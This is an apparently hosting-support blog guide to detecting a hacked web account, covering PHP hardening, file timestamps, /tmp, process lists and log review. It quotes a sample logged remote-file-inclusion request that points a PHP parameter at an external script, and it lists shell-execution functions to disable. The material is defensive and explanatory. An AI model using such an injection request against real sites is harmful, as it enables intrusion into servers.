HOW TO: Know if You’ve Been Hacked
I frequently cleaned cracked WestHost accounts, but sometimes they are not actually cracked or it’s a little hard to track down.
Here is a guide for what to look for if you think that something might be compromised. Some of this information is for WestHost accounts purchased before Nov. 2009, but I’ve included things to cover other accounts so it can translate into additional systems, platforms and hosts.
- Location, Location, Location
- PHP Variables
- Modification Dates
- Got POST?
- Check for Strange Files in /tmp
- Check Your Process List for Anything Suspicious
- Know Your Log Files
- Run Some Command Line Checks
- Document
- Google’s Your Friend
- Repetition, Repetition, Repetition
Where is the malicious content initially found? 9 times out of 10 it’ll be in a sub-location of a specific PHP application. And that application is usually the one that was exploited.
Below are common exploited functions within PHP. Ensure the below 3 are disabled if at all possible [or just enabled for the necessary directory].
Quick check of /etc/php.ini variables
disable_functions = passthru,proc_open,shell_exec,system //Ensure these are in the list
register_globals = Off
allow_url_fopen = Off
allow_url_include = Off
While shared accounts in the cPanel system do not have access to the server level php.ini file, you can utilize local PHP configuration files. Here’s a great link from to a forum post with information on how to do so: http://forums.westhost.com/showthread.php?t=14325
What are the modification times on the files? This is very important as it lets you know how old the hack is. If you know when it was put there then you can examine log files for anything suspicious at that time.
Look for pages that have been posted to the most within Apache logs. Typically if there is a backdoor shell it’ll show up in the list.
This is a common location for crackers to stick scripts.
If you see something, either install lsof and take a look at where it’s executing from or, contact us to check for you.
Shared cPanel users will likely just want to contact Technical Support.
Do you know how to enable ftp logs? Where they are kept? bash_history? access_log’s? error_logs? Check them all.
cPanel provides access to the Apache log, but you can also trail system logs via SSH.
Run the command below and look for any strange GET requests.
awk -F ‘”‘ ‘{print $2}’ /var/log/httpd/access_log | grep -E ‘/?’ | less
Example: GET /domain.html/default/theme.php?THEME_DIR=http://www.getit.pl///opinia/Ckrid1.txt?? HTTP/1.1
GET /default/theme.php?THEME_DIR=http://www.getit.pl///opinia/Ckrid1.txt??
This command will work from the shared cPanel accounts.
Always document everything you’ve seen and everything you find and everything you do. If you have backups to restore your site, ensure that you save a copy of the hacked files, remove their permissions, and let Tech Support run a final check of the files in question.
Chances are if someone has been hacked, it’s happened a million times over to others running the same application. Typically there are posts on possible entry points, etc.
Hackers like to repeat things. Why? Because they use scripts to do their work for them. So if you find one instance check for others in other files.
I realize some of this may seem quite technical so please comment with your questions.
This could be expanded, but these steps are good places to check if you are worried about your account’s security. Have any other tricks you’d like to impart now?